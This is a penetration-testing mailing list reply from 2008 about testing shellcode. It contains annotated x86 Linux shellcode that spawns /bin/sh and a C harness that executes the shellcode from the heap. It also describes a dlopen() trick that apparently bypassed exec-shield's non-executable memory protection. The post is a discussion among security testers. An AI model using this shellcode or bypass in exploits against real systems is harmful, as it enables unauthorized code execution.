Penetration Testing mailing list archives
Re: Simple Buffer Overflow (shell testing)
From: "Vuln Dev" <vulndev3 () gmail com>
Date: Tue, 15 Jan 2008 15:04:17 +0100
On 10 Jan 2008 02:09:46 -0000, <loki6 () orange nl> wrote: [snip]
- How do I test shellcode
Hi all. Ironmonkey6, I tested your shellcode on my Fedora Core 7 and it did not work. It seems to fail to correctly set %eax to 0xb and segfaults, but could be my environment test is bad, infact go on ... ... for me worked this code: --------------------------------8<----------------------------------------- #include <dlfcn.h> #include <stdio.h> #include <sys/types.h> #include <sys/shm.h> char shellcode[23] = "\x6a\x0b" // push $0xb "\x58" // pop %eax // This push/pop sets %eax to 0x0b "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp,%ecx "\xcd\x80"; // int $0x80 main() { // ld-linux.so loosens attributes on non-exec // shared memory and heap? // dlopen("/lib/libm.so.6",RTLD_LAZY); // SHARED MEMORY: attach shm to addr // // int shmid; // void *addr; // // shmid=shmget(IPC_PRIVATE,200,0700); // addr=shmat(shmid,NULL,0700); // HEAP // void *addr; addr=malloc(23); memcpy(addr,shellcode,23); void (* f)(); f=(void *)addr; f(); } --------------------------------8<----------------------------------------- Curious about why the dlopen() stuff is just there? No? Ok I'll tell anyway :) I had some problems to bypass OS security settings on non-exec stack and heap and shared memory (... and what else ..). My pogram "correctly" showed no "wx" permissions in /proc/<pid>/maps so I could not execute the shellcode in no other way than using inline assembly. Strangely enough it turned out that the easiest way was calling dlopen() before jumping into the heap. Only my two cents, hope this helps. Sorry for my bad English, thankyou everybody, Roberto. Question: is anybody able to reproduce the same strange dlopen() behaviour? /proc/sys/kernel/exec-shield-randomize is 1 and /proc/sys/kernel/exec-shield is 1 ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Re: Simple Buffer Overflow (shell testing) Vuln Dev (Jan 15)